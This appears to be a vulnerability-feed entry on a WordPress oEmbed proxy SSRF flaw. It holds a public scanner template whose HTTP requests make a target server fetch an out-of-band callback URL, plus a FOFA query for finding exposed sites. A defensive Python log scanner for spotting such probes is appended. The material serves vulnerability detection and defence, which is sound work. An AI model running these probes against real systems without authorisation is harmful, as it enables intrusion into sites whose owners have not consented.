wordpress-ssrf-oembed: Wordpress Oembed Proxy - Server-side request forgery

Date: 2025-08-01 | Affected software: wordpress | PoC: public

Vulnerability description

The oEmbed feature in WordPress allows embedding content from external sources, and if it's not properly secured, it could be exploited for SSRF.

PoC code [public]

id: wordpress-ssrf-oembed

info:
  name: Wordpress Oembed Proxy - Server-side request forgery
  author: dhiyaneshDk
  severity: medium
  description: The oEmbed feature in WordPress allows embedding content from external sources, and if it's not properly secured, it could be exploited for SSRF.
  reference:
    - https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-web/wordpress.html
    - https://github.com/incogbyte/quickpress/blob/master/core/req.go
  classification:
    cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: wordpress
    product: wordpress
    fofa-query: body="oembed" && body="wp-"
  tags: wordpress,ssrf,oast,oembed,vuln

http:
  - raw:
      - |
        GET /wp-json/oembed/1.0/proxy HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /wp-json/oembed/1.0/proxy?url=http://{{interactsh-url}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_1
        words:
          - 'rest_missing_callback_param'

      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4a0a00473045022100b75f27deeb2e93697c25440c822f8c868943179c9342d5c6eaed272614e24fd1022029a429bc2a01f3e5461ef4666342d7ae2491d2a51dd91f5de7c0ad9ac68eefde:922c64590222798bb761d5b6d8e72950
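Added defender-side example, not part of the template above or of WordPress itself: a small Python scanner that reads web-server access-log lines and flags requests to the oEmbed proxy endpoint named in the template whose url= parameter points at a loopback, private or link-local address (the pattern an SSRF probe against this endpoint leaves behind). The endpoint path comes from the template; the combined log format and the sample log lines are assumptions constructed for the example.

```python
import re
from ipaddress import ip_address
from urllib.parse import urlsplit, parse_qs

OEMBED_PROXY = "/wp-json/oembed/1.0/proxy"

# Apache/Nginx "combined" access-log format (assumed): client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def classify_target(url):
    """Classify the url= value as 'internal', 'external' or 'non-http'."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if parts.scheme not in ("http", "https") or not host:
        return "non-http"
    if host == "localhost" or host.endswith((".localhost", ".internal")):
        return "internal"
    try:
        addr = ip_address(host)
    except ValueError:
        return "external"  # a DNS name; no resolution is attempted so the check runs offline
    if addr.is_private or addr.is_loopback or addr.is_link_local or addr.is_reserved:
        return "internal"
    return "external"

def scan_access_log(lines):
    """Return one finding per oEmbed-proxy request that carried a url= parameter."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        if path.rstrip("/") != OEMBED_PROXY:
            continue
        urls = parse_qs(query).get("url", [])   # parse_qs percent-decodes the value
        if not urls:
            continue  # the template's first probe has no url= and only fingerprints the endpoint
        findings.append({"client": m.group("ip"), "status": int(m.group("status")),
                         "url": urls[0], "target": classify_target(urls[0])})
    return findings

# Constructed sample log lines (RFC 5737 documentation addresses), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Aug/2025:10:00:00 +0000] "GET /wp-json/oembed/1.0/proxy HTTP/1.1" 400 120',
    '203.0.113.5 - - [01/Aug/2025:10:00:01 +0000] "GET /wp-json/oembed/1.0/proxy?url=http%3A%2F%2F127.0.0.1%3A8080%2F HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Aug/2025:10:00:02 +0000] "GET /wp-json/oembed/1.0/proxy?url=https://www.example.com/watch?v=abc HTTP/1.1" 401 90',
    '198.51.100.7 - - [01/Aug/2025:10:00:03 +0000] "GET /wp-admin/ HTTP/1.1" 302 0',
]
```

Findings with target "internal" and a 200 status are the ones worth triaging first, since they indicate the proxy fetched the internal URL on the client's behalf; an "internal" finding with 401 or 403 shows a probe the endpoint refused.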
